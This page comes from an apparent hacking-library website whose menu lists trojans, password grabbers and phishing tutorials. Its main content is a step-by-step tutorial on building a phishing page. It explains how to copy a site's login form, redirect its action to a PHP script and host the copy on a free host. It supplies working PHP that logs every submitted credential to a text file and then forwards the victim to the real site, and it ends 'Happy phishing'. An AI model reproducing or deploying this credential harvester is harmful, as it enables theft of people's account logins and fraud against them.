Magazine posts:
Files available:
38
293
Hacking Library
Main page
Library magazine
Text archives
Trojans related
Password related
Messenger related
IRC related
Virus related
Web bug scanners
Nukers/Flooders
IP Scanners
Security area
Webmasters area
Missing files
About us
Contact us
Links / Affiliates
Underground Libra
DDLbyte.com
Macintosh UG List
Warez Downloads
Progenic Toplist
r00t Security
Suck-O Community
haxxx.net
Direct Downloads
Hacking Library password
 Global tip
Library
Donate to unlock the passworded files and support us!
Library
 
 Most recent posted
  Google's spyware! Aug/8
  Virus spreadingFeb/18
  Setup iStealer for PHP loggingFeb/13
  Password grabbersFeb/12
  Keylogging passwordsFeb/11
  Steal logins with fake sitesAug/3
  Hidden programs in WindowsJul/21
  DoS Attack tutorialJul/18
  SQL Injections tutorialJul/18
  Another phishing tutorialJul/18
  Phishing tutorial Jul/18
  Defacing a website Jul/18
  Whats is hacking? How its done?Jul/18
  Telnet hacking tutorialJul/17
  Simple cmd.exe tricks for startersJul/17
  Hacking a Network ComputerJul/17
  Basics of PHPJul/10
  What is a hacker? Jul/10
  Find an IP address Jul/10
  How a trojan/rat works in few words Jul/10
  How to catch a hacker Jul/10
  Few words about exploits Jul/10
.
Library magazine
1. First things first you must choose the site which you wanna make a phisher from.

2. When you found your site right click on it and say "view source" and save it on desktop as 
index.htm

3. Open the "index.htm" with notepad and find search the source for the word "action=". you 
should find a command looking like this
<form action="RANDOM URL" method="post">
or anything alike and probably more inside like "id=" and "autocomplete=".

4. change the url (in this case "RANDOM URL") to "write.php"

5. If the method is "post" then change it to "get"

5. Save index.htm

6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of 
http://www.700megs.com. Create a free website.

7. login to your website and go to "file manager"

8. delete the file thats already there called "index.htm" and upload your "index.htm" 
(the one you just made)

9. Create a new file called "write.php" and copy / paste this:

<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote 
his/her password. so it should say like this:
header("Location: http://hotmail.com ");
you might want to change the textfile name so others wont be able to view the file.

11. Save this file (write.php), and upload it to the subdomain aswell

13. test out your website. type in something in your phisher and then go to filemanager and 
open the password file, what you wrote should be typed here!, you can also access the 
password file by going to http://www.yourdomain.700megs.com/passwordfile.txt


Happy phishing
Library
Library